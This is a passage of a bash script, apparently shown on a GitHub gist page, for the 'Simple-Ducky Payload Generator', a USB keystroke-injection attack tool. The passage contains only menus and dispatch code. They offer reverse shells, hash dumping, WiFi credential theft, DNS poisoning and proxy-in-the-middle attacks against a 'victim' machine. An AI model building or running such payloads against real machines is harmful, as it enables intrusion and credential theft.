| elif [ "$option" == "2" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_livehashWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_livehashWIN8nouac | |
| fi | |
| elif [ "$option" == "3" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifunVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifunVIS7nouac | |
| fi | |
| elif [ "$option" == "4" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_wifunWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_wifunWIN8nouac | |
| fi | |
| elif [ "$option" == "5" ]; then | |
| f_mainmenu | |
| elif [ "$option" == "6" ]; then | |
| clear;exit | |
| elif [ "$option" == "*" ]; then | |
| clear;exit | |
| fi | |
| } | |
| ################################################################################# | |
| # Linux & OSX - Banner | |
| ################################################################################# | |
| f_linuxosxbanner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Not much here but they work" | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) " | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Linux & OSX - Options | |
| ################################################################################# | |
| f_linuxosxmenu(){ | |
| f_linuxosxbanner | |
| echo -e "\e[1;34mWhat payload would you like to use?\e[0m" | |
| echo "" | |
| echo "1. OSX Reverse Shell" | |
| echo "2. OSX Single User Mode Reverse Shell" | |
| echo "3. Linux Reverse Shell" | |
| echo "4. Return to Main Menu" | |
| echo "5. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| case $option in | |
| 1) f_osxrev ;; | |
| 2) f_osxsingleuserrev ;; | |
| 3) f_linuxrev ;; | |
| 4) f_mainmenu ;; | |
| 5) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Forced Phishing / Web Attacks - Banner | |
| ################################################################################# | |
| f_forcedphishbanner(){ | |
| clear | |
| echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m " | |
| echo -e "Forced Phishing, because they don't have an option..." | |
| echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo -e "" | |
| } | |
| ################################################################################# | |
| # Forced Phishing / Web Attacks - Options | |
| ################################################################################ | |
| f_forcedphishmenu(){ | |
| f_forcedphishbanner | |
| echo -e "\e[1;34mWhat payload would you like to use?\e[0m" | |
| echo "" | |
| echo "1. Local DNS Poisoning | SE-Toolkit w/UAC (Win Vista/7)" | |
| echo "2. Local DNS Poisoning | SE-Toolkit w/UAC (Win 8)" | |
| echo "3. Local DNS Poisoning | Browser_Autopwn w/UAC (Win Vista/7)" | |
| echo "4. Local DNS Poisoning | Browser_Autopwn w/UAC (Win 8)" | |
| echo "5. Proxy in the Middle (PiTM) | No Admin Needed (Win XP/Vista/7)" | |
| echo "6. Proxy in the Middle (PiTM) | No Admin Needed (Win 8)" | |
| echo "7. Return to Main Menu" | |
| echo "8. Quit" | |
| echo "" | |
| read -p "Option: " option | |
| if [ "$option" == "1" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_setlocaldnsVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_setlocaldnsVIS7nouac | |
| fi | |
| elif [ "$option" == "2" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_setlocaldnsWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_setlocaldnsWIN8nouac | |
| fi | |
| elif [ "$option" == "3" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_autopwnlocaldnsVIS7uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_autopwnlocaldnsVIS7nouac | |
| fi | |
| elif [ "$option" == "4" ]; then | |
| echo "" | |
| read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled | |
| if [ "$uacenabled" == "y" ]; then | |
| f_autopwnlocaldnsWIN8uac | |
| elif [ "$uacenabled" == "n" ]; then | |
| f_autopwnlocaldnsWIN8nouac | |
| fi | |
| elif [ "$option" == "5" ]; then | |
| f_proxyinthemiddleXPVIS7 | |
| elif [ "$option" == "6" ]; then | |
| f_proxyinthemiddleWIN8 | |
| elif [ "$option" == "7" ]; then | |
| f_mainmenu | |
| elif [ "$option" == "8" ]; then | |
| clear;exit | |
| elif [ "$option" == "*" ]; then | |
| clear;exit | |
| fi | |
| } | |
| ################################################################################# | |
| # Run as Root Query | |
| ################################################################################# | |
| #!/bin/bash | |
| #resize -s 35 115 | |
| cd /usr/share/simple-ducky | |
| if [ "$(id -u)" != "0" ]; then | |
| echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2 | |
| exit 1 | |
| else | |
| f_mainmenu | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment